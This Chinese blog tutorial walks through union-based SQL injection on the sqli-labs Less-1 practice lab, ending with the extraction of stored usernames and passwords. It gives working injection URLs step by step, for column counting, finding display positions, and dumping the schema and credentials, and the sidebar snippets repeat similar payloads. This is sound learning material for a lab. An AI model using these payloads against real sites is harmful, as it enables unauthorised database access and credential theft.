简单联合union查询注入

最新推荐文章于 2024-05-29 00:11:31 发布
最新推荐文章于 2024-05-29 00:11:31 发布
阅读量9.1k 收藏 13
点赞数 4
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41630808/article/details/80550132
版权
联合查询有前提  必须有显示位 

用sql-labs来学习
这是第一个
http://127.0.0.1/sqli-labs/Less-1/?id=1

一、判断是否用'做字符串引号
http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+ https://blog.csdn.net/qq_41630808/article/details/80570197

正常输出
出错代表没有闭合  说明没有用'  可能没有用' 或用了"或()

http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+

则是''字符串注入

二、判断它所在的数据库有几列
http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 3 --+ 判断是否有3列

正常
http://127.0.0.1/sqli-labs/Less-1/?id=1'order by 4 --+ 判断是否有4列

错误
说明它输出的内容所在的数据库有3列

四、判断他显示的内容在数据库的第几列

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
Your Login name 在第二列 Your Password在第三列
我选择在第二列输出我想要的内容

五、查找出当前用户权限
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+

root权限
六、查找当前数据库
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+

当前数据库是 security
七、查找security的表名
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),3 --+

表名是 emails,referers,uagents,users
八 、查找users里的字段
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),3 --+


九、查找用户名
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username) from security.users),3 --+

十、查找密码
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(password) from security.users),3 --+

这样 这个就完成了  已经拿到了账号密码 

vcdy
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL入门之第十二讲——UNION 联合查询
henry_rhy的博客
05-09 1万+
UNION 联合查询定义: 之前的JOIN连接,是可以对多个表进行横向列的合并,而不能对按行进行纵向合并。 UNION操作符,则是可以将多个查询结果,按行进行纵向合并 基本语法: SELECT <字段名> FROM <表名> UNION SELECT <字段名> FROM <表名> 1. 单表查询 **UNION **在进行合并结果集的时候,如果合并的结果集中有重复行,只会保留其中一行。 实例1:查询学生表中,将学生编号Sid为2-5的记录和1-3的
MySQL UNION 操作符
吉大三万少女梦的博客
07-20 400
描述 MySQL UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。多个 SELECT 语句会删除重复的数据。 语法 MySQL UNION 操作符语法格式: SELECT expression1, expression2, ... expression_n FROM tables [WHERE conditions] UNION [ALL |
Web渗透-MySql-Sql注入联合查询注入
最新发布
WolvenSec的博客
05-29 1276
SQL注入(SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
SQL注入union 联合注入
weixin_53711701的博客
01-16 4389
SQL注入union联合注入
SQL注入漏洞
haoge1998的博客
04-15 1139
SQL注入漏洞 1、注入攻击的核心点: 拼接有效的语句或代码 确保完成闭合,并且可以改变原有执行逻辑 2、防护: 从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效 基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。 使用mysqli的预处理功能 一、查询注入的数据类型 注入类型可以分为三类: 1、数字型 select * from tables where id = 1; 2、字符型 select * from tables whe
【MySQL】多表查询(JOIN / UNION)
RiceVan的博客
02-07 7892
结果包括employees表的全部行,employees表中的Grant没有department_id,departments表中无对应数值,仍显示在结果中(NULL)。结果包括departments表的全部行,employees表中无对应department_id,仍显示在结果中(NULL)。LEFT / RIGHT OUTER JOIN 表名 ON 条件。INNER JOIN 表名 ON 条件。
sql注入讲解ppt.pptx
08-10
2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. ...
SQL注入思路详解
12-14
1. **联合查询注入Union Query)**:通过`UNION`操作合并两个或更多查询的结果,直接展示数据库中的数据。 2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。...
SQL注入天书 sqli-labs
01-11
4. **联合查询注入**:利用UNION操作符合并两个或多个查询,以显示非预期的结果。 5. **堆叠查询注入**:通过构造多条查询语句并用分号分隔,一次性执行多个查询。 6. **信息收集**:学习如何获取数据库版本、表名...
SQL注入漏洞演示源代码
12-19
- **联合查询注入**:利用UNION操作符将恶意查询与正常查询合并。 3. **防御措施**: - **参数化查询/预编译语句**:将用户输入作为参数,而不是直接插入到SQL语句中。 - **输入验证**:对用户输入进行严格的...
union注入攻击之dvwa靶场实战演练(union秒懂教程)
m0_63028223的博客
04-19 1000
第一步,我们来分析是否存在字符型注入点: 1、id=1 返回正常。 2、id=1' 返回错误 3、id=1 and 1=1 “1=1” 为真返回正常 4、id=1 and 1=2 “1=2”为假返回错误。 测试符合这四个条件,证明该位置存在字符型注入点漏洞。 //原理分析: 因为字符型的注入点不同于数字型 数字型注入点 后台的php传参点格式为 id=$ 字符型则为 'id=$' 有两个引号 下面以dvwa靶场进行实验演示 我们输入1'# 来使'i...
SQL 注入UNION 查询(回显)
猎荒者
12-13 3057
前言 随笔一篇,记录方法,举一反三。 1 环境 ① 在线漏洞网站:http://testphp.vulnweb.com ② 浏览器:Firefox ③ 插件:Hackbar Quantum ps: 正版 Hackbar 已经收费,解决方法: 【1】采用低版本的 Hackbar 【2】采用其他替代品,如: 本次实验主要使用 Backbar Quantum load: 加载当前页面的 URL spl...
MySQL基础(四)-子查询union连接查询
five小点心的博客
12-08 699
select语句当中嵌套select语句,被嵌套的select语句是子查询
组合查询union与join
Mihoutaoxiaozi的博客
06-01 585
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。
SQL注入系列篇之union联合注入
d59hao的博客
04-27 710
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
union 联合注入,以及SQL注入
2303_81631620的博客
03-28 810
2.输入x’ and ‘1’='1,对应的Sql 语句:select * from table where id = ‘x’ and ‘1’=‘1’,语法正确,逻辑判断正确,所以返回正确。2.加and 1=1,如输入1 and 1=1,对应的sql:select * from table where id=1’ and 1=1 没有语法错误且逻辑判断为正确,所以返回正常。3.输入x’and ‘1’='2,对应的Sql 语句:select * from where id = ‘x’ and ‘1’=‘2’,
MySQL中Union联合查询使用实践总结
小小默:进无止境
06-07 934
联合查询:将多次查询(多条select语句),在记录上进行拼接(一般记录数增加,但是字段数不会增加)这里需要注意的是,多条select 语句字段数必须一致,字段类型可以不同!语法格式:select 1.. union[union 选项] select 2..union选项:与select选项一样,有两个 All : 保留所有记录; Distinct : 去重;默认值 对记录去重:selec
MySQL 基础———— UNION 联合查询
Morty的技术乐园
11-10 3693
引言 联合查询与连接查询不同,通过UNION 关键字,我们可以将多个查询语句一同执行并将结果集展示出来,不涉及到任何关联关系。 UNION 的含义是“联合,并集,结合”,在MySQL中可以将多个查询语句的结果合并成一个结果集,在MySQL 不支持FULL OUTER JOIN 的情况下,弥补了“并集” 查询的短板。 连接查询相关知识总结,参考《MySQL 基础 ———— 连接查询》。 一、...
sql注入union联合查询
05-19
SQL注入是一种针对数据库的攻击方式,攻击者通过构造恶意输入,将SQL语句的语义进行修改,从而达到非法访问、篡改和删除数据等目的。其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,使得SQL语句被修改,例如: ``` SELECT * FROM users WHERE name = 'admin' AND password = '123456' ``` 攻击者可以在输入框中输入如下内容: ``` admin' UNION SELECT 1,2,3,4-- ``` 这样,SQL语句就会变成: ``` SELECT * FROM users WHERE name = 'admin' UNION SELECT 1,2,3,4--' AND password = '123456' ``` 这条SQL语句的含义是:先查询用户名为admin的用户信息,然后将查询结果与1,2,3,4合并成一个结果集。由于这条语句中的1,2,3,4并没有实际意义,所以攻击者可以通过不断尝试,来获取不同的信息。 为了防止SQL注入攻击,开发人员应该对输入的数据进行过滤和验证,特别是对于涉及到数据库操作的输入,更应该进行严格的验证和过滤。一般来说,可以采用参数化查询、白名单过滤、限制字符集等方式来防止SQL注入攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值